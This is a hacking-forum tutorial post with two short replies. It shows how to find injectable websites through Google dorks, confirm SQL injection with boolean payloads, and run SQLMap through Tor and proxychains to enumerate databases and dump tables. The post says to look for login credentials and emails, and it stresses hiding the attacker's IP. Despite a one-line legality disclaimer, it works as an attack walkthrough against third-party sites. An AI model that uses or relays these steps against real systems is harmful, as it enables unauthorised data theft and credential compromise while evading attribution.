Dashboard Articles Playground Discussions More
Follow

read a websites DB using SQLMap & Proxychains

CygnusH33L
12 years ago

0

Here I will show you how use SQLMap to test for SQL Exploits whilst using proxychains to hide your IP

I will be using;

OS: BackTrack 5 installed within VirtualBox

Tools: SQLMap (pre-installed on BT5), Tor (install instructions) and Proxychains

SQLMap is obviously for SQL injection so you need to know a little SQL just in case you don’t here’s a quick rundown but I suggest you go learn it;
SQL is used for reading, modifying, updating and deleting from databases.
READING: SELECT item FROM Table WHERE product=3
MODIFYING/UPDATING: UPDATE Table SET item=new WHERE product=3
DELETING: DELETE FROM Table WHERE product=3 or you could drop the whole table DROP Table;

[h2 id=“introduction”]Finding a website for testing[/h2] (note: this is for demonstration purposes only, it is illegal to test against sites that are NOT yours)
We need a website that passes the parameters through the URL, the easiest way is Dorking, using Google or similar to perform specific searches. Startpage.com would be better than Google as it doesn’t track or save data. To refine your searches on Google use inurl: this will tell Google to only show results where our search matches the URL. If we searched inurl:products.php?product= we’d get URLs like this;
www.CygnusH33L.tk/products.php?product= www.CygnusH33LExample.tk/products.php?product= www.CygnusH33Ltest.tk/products.php?product=

You can also use SQLMap to search Google and test the results directly though I do not personally like this method.
python sqlmap.py -g inurl:products.php?id=

[h2 id=“introduction”]Testing a website for injection points.[/h2]

http://www.CygnusH33L.tk/products.php?product=3
Now the above URL is a our test target, see how we define the parameter in the URL product=3
websites that do not sanitize their parameters properly are open to injection attacks so we can modify the URL
http://www.CygnusH33L.tk/products.php?product=3 and 1=0--
Adding 1=0– to the end will, if not sanitized will tell it to show nothing,
SELECT item FROM Table WHERE product=3 and 1=0--
see how it gets added on the end, so now if the website displays a blank page we can do another test to make sure. Just do the opposite;
http://www.CygnusH33L.tk/products.php?product=3 and 1=1--
The website should now display correctly

[h2 id=“introduction”]Using SQLMap to read the DB[/h2]
Open a terminal

(if you have Tor installed start it, if not download Vidalia)
easiest way to get vidalia, in the terminal type
sudo apt-get install synaptics
now go to
System -> Administration -> synaptics package manager
search for vidalia and install along with Tor (should prompt to install these with vidalia).

we will use proxychains to hide our IP. To configure proxychains type in the terminal
sudo gedit /etc/proxychains.conf
then scroll to the bottom and look for the proxy list;
```[ProxyList]

add proxy here …

meanwile

defaults set to “tor”

socks4 127.0.0.1 9050```
the above socks4 127.0.01 9050 should have no # in front as this is Tor, you can add more Socks proxys in the same format.

Now start Tor/Vidalia

back to the terminal, start SQLMap
cd /pentest/database/sqlmap/
SQLMap help
python sqlmap.py -help

test for injection point, (for example the test site will be CygnusH33L.tk/products.php?product=3)
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3
SQLMap will now test the URL
should it not pass you can try the verbose mode by using the option -v you can set this between 1 for low and 6 for high.

now its confirmed its injectable lets move on, so we want to know the database names, we can do this like so;
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 --dbs
–dbs tells sqlmap to enumerate the databases.

now we can enumerate the tables
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 -D Database_name --tables
-D tells sqlmap what the DB name is and –table calls the tables :/
If there are loads of tables we can use the option –threads to specify more threads (default is 1) to use it just do –threads 8 (8 is recommended, I run 10 usually with no issues).

now we have the tables we can pull the information or columns from them, depending what your looking for you would chose the correct table, so if we wanted to login into the site we might look for admin, customer, user, member tables etc looking for usernames and passwords, if we wanted emails we may look in emails, newsletters, users, members etc and so on, just find the relevant table name.

to dump the column/tables data use,
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 -D Database_name -T table_name --dump --threads 8
this will dump all the columns and data from the table chosen, it will be dumped in a file
/pentest/database/sqlmap/output/www.CygnusH33L.tk/dump/table_name.csv

I personally love SQLMap it makes testing SQL injections so easy compared with manual testing, I will expand on this tutorial to incorporate the many more features of SQLMap at a later date. I hope this helps some of you understand SQLMap and how it can be used safely with Tor and Proxychains.

 

I would love to change the world, but they won’t give me the source code.

Image

2replies
3voices
3,762views
Mastermind [thekinghack]
12 years ago

0

cool ! i like hahaha

 

what u need is what u get when u’re hacker !!! xx

oxide
12 years ago

0

ok also make sure when you use proxychains that your proxy isnt leaking out arbitrary dns data

 

i bake therefore im fried!!

Image

You must be logged in to reply to this discussion. Login
1 of 3

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss